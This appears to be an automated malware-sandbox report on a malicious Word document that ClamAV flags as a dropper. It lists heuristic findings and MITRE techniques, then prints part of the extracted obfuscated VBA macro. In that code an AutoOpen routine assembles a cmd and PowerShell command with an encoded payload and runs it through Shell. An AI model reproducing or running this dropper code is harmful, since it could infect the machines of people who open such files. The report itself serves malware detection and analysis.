Verdict: MALICIOUS (Risk Score: 242)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains a VBA macro with an AutoOpen subroutine that calls the Shell function. This indicates the macro is designed to execute arbitrary commands. The ClamAV detection name 'Doc.Dropper.Agent-6574760-0' suggests it acts as a dropper for other malware. The VBA code appears to be obfuscated, but the presence of the Shell() call is a strong indicator of malicious intent to download and execute a secondary payload.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6574783-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6574783-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11214 bytes |

SHA-256: 651f622a4d7eba5d4017d4b674a0229d0d28a1efc4699eecc00c25b8ac8c3210
Preview script (first 1,000 lines of the extracted script; the preview is truncated)

```vb
Attribute VB_Name = "CswGkYsKwrLu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function lpRBt()
On Error Resume Next
StDRTI = Hex(imucun + Hex(ZjMbZJ) * 6048 + Round(OrtJLa))
KiKXuv = Cos(MMQMDz)
fXujY = CDate(NiwvJ)
SiMYJw = Cos(zbQRW)
jiTAKN = Hex(DkjUw + Hex(nTQbhO) * 27631 + Round(cMAoH))
CAnPF = Cos(noYui)
hDjivs = CDate(fJhiz)
DHkGVS = Cos(DwCCz)
lpRBt = jHcXvUYJT + Shell(LkGvlPjKRD + Chr(FrbcFvJcT + vbKeyC + BzSPs) + kRFcWjREja + USLATvI + RFfJWLEYVXU + hwPlNiwOCl + idtorAIKbu + lNMkvt, 36552 - 36552)
Oaqwu = Hex(tvhKZ + Hex(QIObGV) * 34322 + Round(hCQCiD))
VijBjk = Cos(dzpKmM)
nVzKL = CDate(Kwcrh)
JmMJnP = Cos(uXMzJt)
End Function
Sub Autoopen()
On Error Resume Next
ofOlw = Hex(FitjTr + Hex(wRXGr) * 38461 + Round(bqQqCu))
RiaYoR = Cos(Pijqv)
fbsfqv = CDate(sdAGFp)
iwOYjB = Cos(nASIfa)
lpRBt
imnQv = Hex(QAzlA + Hex(CCohU) * 35153 + Round(UTRQLG))
KsaZXL = Cos(VJqMq)
ThhBd = CDate(dzlwS)
pjFDRV = Cos(JBLYZX)
End Sub
Attribute VB_Name = "oljswViIf"
Function kRFcWjREja()
On Error Resume Next
BEEGwI = Hex(XBUkw + Hex(InJFS) * 56861 + Round(taicL))
TuJqnj = Cos(LIrji)
aDiim = CDate(ozZwP)
lBlra = Cos(cuAoIN)
RiVhCYoJ = "md LmRYs" + "pB oqnpH" + "wQNicAhGYOPqCS" + "Dlq ztvmkR" + "qbndNj & " + " %^c^o"
jEtzz = Hex(caNDNO + Hex(rGWwtw) * 88019 + Round(BfRTi))
EjEmu = Cos(TFRvA)
AnwXwX = CDate(iiVXDu)
TuiZb = Cos(RiXrJR)
QiFaPqPYD = "^m^S^p^E^c^% " + " " + " " + "%^c^o^m^S^p^E^" + "c^% " + "/V " + " " + " /c " + " set %GMZ"
zdmob = Hex(TzGSdj + Hex(rDiiLA) * 84224 + Round(zYasUU))
VPHOj = Cos(iBwjw)
aNNcA = CDate(hoNwpf)
ZjAEL = Cos(HbLcrK)
LPhRwz = "wfkkVT" + "iXENDJ%" + "=m" + "jZD" + "ABp&&s" + "et %YYwKfvi"
ApMCm = Hex(PsRWj + Hex(ZzmjuZ) * 50408 + Round(EHViwk))
pfPkWR = Cos(ssbLKn)
QIMQI = CDate(wUvQCQ)
KsTiFB = Cos(aNBlN)
RBziOVF = "tGhzo%=p&&set" + " %" + "nNpAolWfwkjR" + "%=o^w&&se" + "t %NCidR"
oHuEjP = Hex(MozIOo + Hex(oUjwhF) * 68263 + Round(zYtFIV))
DGbCiz = Cos(arhndW)
tKURC = CDate(FdCDIu)
HVLdG = Cos(WkshL)
cFwFCMdT = "lZoE" + "spHC" + "RD%=SA" + "USUWqZjHoo&&s" + "et %zr" + "crbJbiADFkv" + "F%=!%YYwKfvi" + "tGhzo%!&&set" + " %D" + "DKiFWLwBHSkuqS"
CzusR = Hex(bNDGOZ + Hex(GsjZDX) * 88220 + Round(jjEjDh))
zlAdI = Cos(zdLll)
hhJBH = CDate(pzYnLp)
RZSSq = Cos(OMOOS)
VEuYKSVHqJb = "%=XvGk" + "jzHC&&s" + "et %SwVIAwzjbsT" + "cj%=e^r&&set" + " %wnClNrJ" + "kXsUl" + "Z%=!%nNpAolWfwk" + "jR%!&&se"
kQjGP = Hex(nSNMC + Hex(fwuOh) * 77762 + Round(aKSqh))
KVZWwS = Cos(rvWVI)
IPXXwF = CDate(tntRz)
aCrvSa = Cos(ZFCOvQ)
dFsAUKaCsuF = "t %ZTljkDuVFt" + "QY%=s&&" + "set %fiVrLE" + "wJwl" + "kAiGC%=" + "GHlKikYiDiB&&se" + "t %WCboOsocl" + "Xwhz%=he&&" + "se"
jhjaYG = Hex(fvCnVl + Hex(nWcHX) * 33506 + Round(QzAEvI))
DNJbj = Cos(nLETt)
quGpHw = CDate(pmiaGY)
AShjVd = Cos(VcitMp)
EUjdhXwwE = "t %DLUWXE" + "DwMLAzO" + "%=ll&&!%zrc" + "rbJbiAD" + "FkvF" + "%!"
WbSJO = Hex(awKKtI + Hex(ThUmC) * 6763 + Round(KUdVzP))
VRXvuG = Cos(SKQRs)
YCIXpN = CDate(doIwr)
JOBwz = Cos(zjFjm)
jqLRA = "!%wn" + "ClNrJ" + "kXsUlZ%!!%" + "SwVIAwzjbsTc" + "j%!!"
wBqBX = Hex(VJJII + Hex(GfkrR) * 63365 + Round(bDmzA))
MTFtK = Cos(VWHrL)
cREaiw = CDate(FprRb)
RYXKL = Cos(EqjKk)
YGkSP = "%ZTljkDuV" + "FtQY%!!%WCbo" + "OsoclXw" + "hz%!!%DLUW" + "XEDwMLAz" + "O%! -e KAAgAG4"
kRFcWjREja = RiVhCYoJ + QiFaPqPYD + LPhRwz + RBziOVF + cFwFCMdT + VEuYKSVHqJb + dFsAUKaCsuF + EUjdhXwwE + jqLRA + YGkSP
End Function
Function USLATvI()
On Error Resume Next
Qzonp = Hex(oYKpPE + Hex(Vnwub) * 39784 + Round(dltuz))
vfGqs = Cos(UJRzM)
AsdCz = CDate(ISJqZI)
HqimiG = Cos(pdDJST)
zGoCjBiw = "AR" + "QBXAC0ATwBiAEoA" + "RQ" + "BjAHQAI"
JkrDnj = Hex(bcYaoQ + Hex(fCFFzv) * 70987 + Round(mWntS))
WpUkdj = Cos(iSmlYS)
NJMqpH = CDate(bzDUX)
tzUQu = Cos(zEnDp)
ratnfCGwj = "AAgAFMAWQBzAH" + "QARQBtA" + "C4ASQBPAC4AUw" + "BUAFIARQBh" + "AE0AUgBFAGEAZA" + "BFAF"
kmw ... (truncated)
```